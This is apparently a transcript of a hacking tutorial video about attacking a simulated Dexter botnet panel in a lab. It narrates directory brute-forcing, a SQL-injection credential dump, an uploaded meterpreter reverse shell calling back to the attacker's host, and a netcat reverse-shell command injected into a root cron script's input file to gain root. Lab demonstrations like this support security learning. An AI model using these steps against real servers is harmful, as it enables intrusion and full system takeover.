Dexter is a botnet computer malware that infects computers and then executes commands remotely. In the following video, I'm going to demonstrate how I'm going to disrupt such a Dexter server so all the slave PCs are not infected anymore and the Dexter server crashes. So, I have my Dexter server running at 192.168.1.103. This is a simulated Dexter server. As you can see, it's running on VirtualBox. But I'm not going to touch VirtualBox, I'm just going to hack into it. So, let's see what we have here. We have a panel link where I see you can log in. What else? This is, I think it's a malware sample. But for now, let's focus on this panel. So let's try simple combination of passwords. Maybe we'll get lucky, but we'll obviously get this error message. So let's bring out Dearbuster. Dearbuster is an app that brute forces directories and files on the web server. For example, /panel/ login.php. It finds hidden pages. So for the target URL, I'm going to choose this, and then I'll just insert a word list. Now I'm going to start. As you can see, the test has finished, and if we go in results to review, we can see panel. And now we have all these files. So let's see what's inside master.php. Oh, so it looks like this is the place on the server where the attacker, the Dexter attacker, would execute commands on all the slave PCs on the botnet. Let's see what else we got. Let's check out upload.php. Let's try uploading any file. A test file. But as you can see, we cannot upload it since we are not logged in. So we need to log in. Now, you can see there's this gateway.php file, and I think it's used for SQL queries. Maybe it is SQL injectable. I have an exploit that can do SQL injections in the Dexter software, in the Dexter malware. Now, I found about an exploit that can SQL inject this gateway.php in this Dexter malware server. So let's execute it. I'll start the terminal. I'll use su superuser. Now I want to go cd/home/exploits because that's where I have my exploits. /Prodicode/exploits. As you can see, we have this exploit right here. You can find it on exploit.db. Just search for this name. But let's see how it's used. As you can see, it's Dexter Casino Loader Bounth. It exploits Casino Loader panels. This is obviously a Casino Loader. And it was made by Brian Wallace, who is a botnet hunter. So let's use this script to dump. We enter the URL of the gateway.php. And there we go. It SQL injected it. Now the password is, if I had any real talent, I would make money legitimately, and the user is loser botter. Let's copy the password and log in. Okay, now you're online. Now here comes the fun part. We can try to generate a PHP shell and get a reverse shell on the actual server. Let's try and do that. So right now I'm going to generate a PHP shell using MSF Venom. So let's just enter our directory. Right here. I'm going to remove the test file used for the test upload. Now let's create the shell. So I'm going to type MSF Venom. The payload I'm going to use php/meter preter reverse TCP. lhost, my IPv4 is 192.168.1.109, I think. And as for L port, I'm going to use the basic 4444. Now I'm going to download this into shell.php. We're going to set the lhost 192.168.1.109 and the L port to 4444. Now we're just going to run this listener. The listener started, as you can see. It's now listening for something on 192.168.1.109.4444. So let's upload our shell. Now we're going to use exploit/multi/handler. We're going to set the payload to php/meter preter reverse TCP. We're going to set the lhost 192.168.1.109 and the L port to 4444. Now we're just going to run this listener. The listener started, as you can see. It's now listening for something on 192.168.1.109.4444. So let's upload our shell and execute it. Okay, now our shell file is uploaded, but we need to execute it. This URL will just load the shell, but will not execute it. If we hover over delete and we inspect the element, we can see that it goes to upload.php and the query, a query parameter, is del from access/shell.php. That could hint us that access is a folder where files are kept. If we navigate to our address/panel/access, we can see that we have our shell.php, so we're just going to activate it. Now, as you can see, we have a meter preter session opened. Let's interact with it. Okay, now let's just open a shell. Alright, so it seems like we are inside the server, but there's a single problem. If we type who am I, we are not root. The server, the Apache server, was not run under root. So we need to do some privilege escalation. In order to shut down the server or disrupt it, we need our user ID to be 0 or root. In order to do that, let's look around here. First of all, it seems like it's running generic Linux. So let's just look around and see what we can find. So ls, we're currently in the access directory, so there's the shell.php. Now if you change directory and go up, ls, as you can see right now we're in the panel. Now let's just go up once again. And right here you see there are some interesting files. There's anti-tamper.list and anti-tamper.pi. Let's see what's inside anti-tamper.pi. Alright, so this is a script that opens the anti-tamper.list file and then checks, I think it's an MD5 sum check. So this script is, I think it's on a cron job, so that means it will run automatically every few minutes, and if I'm correct, it's going to be run by root every something minutes, every few seconds. But we can also see that this script operates os.system.s. So if we can inject the command in the s variable and then the system will execute it as root, maybe we can get a netcat channel, and on the netcat channel we'll have root. So let's see what's inside anti-tamper.list. Okay. We can copy this file. Let's just copy it. We'll keep this open. We'll open a new terminal. We'll super user. Alright, now we're going into our main directory. Now we're going to create another anti-tamper.list. We're going to use nano. And we're just going to paste this, but we're also going to inject our code right here. So, on a new line, I'll just have a normal JSON line. And right here, it doesn't matter what we write right here because the path doesn't matter. We just need to inject our code. So we're just going to write Prodicode. Okay, now right here, we're going to put on a quote. So we finished with our MD5 checksum string, and then end of line character, so we can execute our command. So now we'll just make a simple netcat tunnel. (192.168.1.109) on the port 5555 hashtag. Alright, now let's just save this. Now if you cat anti-tamper.list, you can see that we have our injected line, and this will be used to inject the code into the server. So before putting this anti-tamper.list on the server, we should have a listener. So we'll just netcat and LFEP on the port 5555. Oops, sorry, netcat. Now it's listening. Now we just need to replace this anti-tamper.list with this anti-tamper.list, and then let root execute anti-tamper.pi, and we will be done. So let's go to file uploader and upload the anti-tamper.list. Now if you go in the shell, the non-root shell we have on the server, and we go into our directory, we can see that now we have an anti-tamper.list here, and if we cat it, it's the malicious anti-tamper.list. Now we're going to go up to directories, and this is the place where I need to inject the anti-tamper.list. So we're just going to do cat /var/www/panel/access/anti-tamper.list point list. So this is where I have uploaded it. This is the malicious anti-tamper, and we're just going to tunnel it to the actual anti-tamper.list. Now if we cat anti-tamper.list, it's malicious. And now we just wait for root to execute this, and we will get a reverse shell, a root reverse shell. Okay, so as you can see, we just got a connection, and now we're in a shell. So let's do who am I? I am root. If we type ID, we are root. Now we can do anything. We could upload a script that destroys the entire system, that breaks it. We could do anything, but just for demonstration purposes, I'm going to halt it. So /sbin/halt. As you can see, the session closed. This closed too. That's because the server shut down. So thank you for watching. I hope this video helped you understand hacking. And for more hacking, security and interesting software videos, you should subscribe to our channel. Goodbye.